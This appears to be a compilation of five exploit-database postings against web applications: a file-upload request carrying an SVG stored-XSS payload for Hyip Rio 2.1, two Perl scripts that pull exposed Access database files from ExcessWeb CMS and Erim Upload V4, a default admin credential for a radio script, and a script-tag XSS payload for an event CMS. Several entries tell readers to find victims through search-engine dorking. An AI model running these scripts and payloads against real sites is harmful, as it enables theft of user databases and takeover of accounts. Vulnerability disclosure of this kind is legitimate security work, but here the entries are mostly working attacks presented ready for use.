<pre><code># Exploit Title: Hyip Rio 2.1 - Arbitrary File Upload<br /># Exploit Author: CraCkEr<br /># Date: 30/07/2023<br /># Vendor: tdevs<br /># Vendor Homepage: https://tdevs.co/<br /># Software Link: https://hyiprio-feature.tdevs.co/<br /># Tested on: Windows 10 Pro<br /># Impact: Allows User to upload files to the web server<br /># CVE: CVE-2023-4382<br /><br /><br />## Description<br /><br />Allows Attacker to upload malicious files onto the server, such as Stored XSS<br /><br /><br />## Steps to Reproduce:<br /><br />1. Login as a [Normal User]<br />2. In [User Dashboard], go to [Profile Settings] on this Path: https://website/user/settings<br />3. Upload any Image into the [avatar]<br />4. Capture the POST Request with [Burp Proxy Intercept]<br />5. Edit the file extension to .svg & inject your [Evil-Code] or [Stored XSS]<br /> <br />-----------------------------------------------------------<br />POST /user/settings/profile-update HTTP/2<br /><br />Content-Disposition: form-data; name="avatar"; filename="XSS.svg"<br />Content-Type: image/png<br /><br /><?xml version="1.0" standalone="no"?><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><br /><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><br /> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><br /> <script type="text/javascript"><br /> alert("XSS by Skalvin");<br /> </script><br /></svg><br />-----------------------------------------------------------<br /><br />6. Send the Request<br />7. Capture the GET request from [Burp Logger] to get the Path of your Uploaded [Stored-XSS] or right-click on the Avatar and Copy the Link<br />8. Access your Uploded Evil file on this Path: https://website/assets/global/images/********************.svg<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : ExcessWeb & Network CMS v4.0 Database Disclosure Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 74.0(32-bit) |<br />| # Vendor : http://www.excessweb.co.th/ | <br />| # Dork : Powered by ExcessWeb & Network |<br />====================================================================================================================================<br /><br />poc :<br /><br />[-] Download the database: <br /><br /> The following Perl exploit will attempt to download the (acart.mdb ) file<br /> The (acart.mdb) It is the database and contains all the data .<br /> <br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] save code as perl file : poc.pl<br /><br />[+] code :<br /><br />#!/usr/bin/perl -w<br />#<br /># ExcessWeb & Network CMS v4.0 Database Disclosure Exploit <br />#<br /># Author : indoushka<br />#<br /># Vondor : ToastForums.com<br /> <br /> <br /> <br />use LWP::Simple;<br />use LWP::UserAgent;<br /><br />system('cls');<br />print ('ExcessWeb & Network CMS v4.0 Database Disclosure Exploit');<br />system('color a');<br /><br /><br />if(@ARGV < 2)<br />{<br />print "[-]How To Use\n\n";<br />&help; exit();<br />}<br />sub help()<br />{<br />print "[+] usage1 : perl $0 site.com /path/ \n";<br />print "[+] usage2 : perl $0 localhost / \n";<br />}<br />($TargetIP, $path, $File,) = @ARGV;<br /><br />$File="database/Webdatas.mdb";<br />my $url = "http://" . $TargetIP . $path . $File;<br />print "\n Fuck you wait!!! \n\n";<br /><br />my $useragent = LWP::UserAgent->new();<br />my $request = $useragent->get($url,":content_file" => "D:/acart.mdb");<br /><br />if ($request->is_success)<br />{<br />print "[+] $url Exploited!\n\n";<br />print "[+] Database saved to D:/acart.mdb\n";<br />exit();<br />}<br />else<br />{<br />print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";<br />exit();<br />}<br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : evsanati radyo v1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) |<br />| # Vendor : https://donanimplus.com/b/evsanati-v1-0-radyo-scripti/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] appears to leave default credentials installed after installation.<br /><br />[+] Use Payload : user & pass = admin <br /><br />[+] panel = yonetim<br /><br />[+] http://127.0.0.1/wwwkacikfmcom/yonetim/home.php<br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Event Locations CMS v1.0.1 - XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) | <br />| # Vendor : https://codecanyon.net/item/event-locations-phpmysql-plugin/22100679 | <br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] click 2 creat a Nouveau RDV & use payload : <script>alert(/indoushka/);</script><br /><br />[+] http://127.0.0.1/cutgg/ <br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Erim Upload V4 Database Disclosure Exploit |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) | <br />| # Vendor : https://script.horje.com/view/218412 | <br />====================================================================================================================================<br /><br />poc :<br /><br />[-] Download the database: <br /><br /> The following Perl exploit will attempt to download the (upload/veritabani/erimicel.mdb ) file<br /> The (upload/veritabani/erimicel.mdb) It is the database and contains all the data .<br /> <br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] save code as perl file : poc.pl<br /><br />[+] code :<br /><br />#!/usr/bin/perl -w<br />#<br /># Erim Upload V4 Database Disclosure Exploit <br />#<br /># Author : indoushka<br />#<br /># Vondor : script.horje.com/view/218412<br /> <br /> <br /> <br />use LWP::Simple;<br />use LWP::UserAgent;<br /><br />system('cls');<br />print ('Erim Upload V4 Database Disclosure Exploit');<br />system('color a');<br /><br /><br />if(@ARGV < 2)<br />{<br />print "[-]How To Use\n\n";<br />&help; exit();<br />}<br />sub help()<br />{<br />print "[+] usage1 : perl $0 site.com /path/ \n";<br />print "[+] usage2 : perl $0 localhost / \n";<br />}<br />($TargetIP, $path, $File,) = @ARGV;<br /><br />$File="upload/veritabani/erimicel.mdb";<br />my $url = "http://" . $TargetIP . $path . $File;<br />print "\n Fuck you wait!!! \n\n";<br /><br />my $useragent = LWP::UserAgent->new();<br />my $request = $useragent->get($url,":content_file" => "D:/erimicel.mdb");<br /><br />if ($request->is_success)<br />{<br />print "[+] $url Exploited!\n\n";<br />print "[+] Database saved to D:/erimicel.mdb\n";<br />exit();<br />}<br />else<br />{<br />print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";<br />exit();<br />}<br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br />=======================================================================================================================================<br /></code></pre>